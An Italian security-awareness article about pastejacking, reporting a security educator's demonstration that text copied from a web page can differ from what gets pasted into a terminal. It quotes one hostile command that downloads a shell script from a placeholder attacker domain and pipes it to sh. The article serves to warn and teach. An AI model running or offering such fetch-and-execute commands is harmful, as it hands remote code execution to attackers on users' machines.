È vero che viviamo in un’era in cui la velocità è tutto e ottenere risultati rapidi è tutto ciò che conta. Tuttavia, poche persone si fermano per un secondo e pensano alle conseguenze.
Ogni giorno, milioni di programmatori, amministratori e ricercatori di sicurezza eseguono attività semplici come copiare e incollare comandi dalle pagine Web direttamente nella console dei propri PC.
Sebbene molti non ci pensino nemmeno, le conseguenze sono molto più gravi e pericolose di quanto si possa pensare a prima vista, soprattutto se si archiviano dati sensibili o di valore.
Un noto esperto di sicurezza ha dedicato del tempo per condividere ciò che accade effettivamente se copi e incolli contenuti da pagine web.
Copia e incolla è un modo semplice per ottenere un hack
Gabriel Friedlander, fondatore della piattaforma di educazione alla sicurezza Wizer, ha tolto la copertina a un diagramma che ti farà pensare due volte prima di copiare e incollare comandi dalle pagine web.
Copiare e incollare contenuti da Internet è diventato così comune in questi giorni che nessuno ci pensa nemmeno.
Tuttavia, Friedlander avverte che alcune pagine Web sono più ingannevoli di quanto potrebbero sembrare a prima vista e ciò che pensi di aver copiato è molto diverso da ciò che hai effettivamente fatto.
E peggio ancora, senza la necessaria conoscenza o guida, le vittime si rendono conto del loro errore solo dopo aver inserito il testo, a quel punto potrebbe essere troppo tardi.
L’analista della sicurezza ha anche progettato un piccolo quiz per i lettori del suo blog in modo che le persone possano davvero capire quanto facilmente sei riluttante ad aprire la porta ai criminali informatici.
Ha fornito un comando da copiare, ma la verità pertinente viene rivelata solo quando incolli il testo e vedi cosa hai effettivamente inserito nella tua configurazione.
Dopo aver copiato il comando mostrato nello screenshot qui sopra, il risultato dell’incolla ti scioccherà, poiché è lontano da ciò che pensavi di duplicare.
curl http://attacker-domain:8000/shell.sh | shA parte un comando completamente diverso presente negli appunti, il carattere di nuova riga (o ritorno) alla fine significa che l’esempio sopra verrà eseguito non appena inserito direttamente nel terminale Linux.
Quindi è meglio essere consapevoli di ciò che sta realmente accadendo e trattarlo come una seria minaccia alla sicurezza. Non stiamo dicendo che tutti i siti web nascondono contenuti dannosi, ma dovresti tenerne conto.
Sei mai stato hackerato inserendo comandi complicati nel tuo terminale? Condividi la tua esperienza con noi nella sezione commenti qui sotto.
Lascia un commento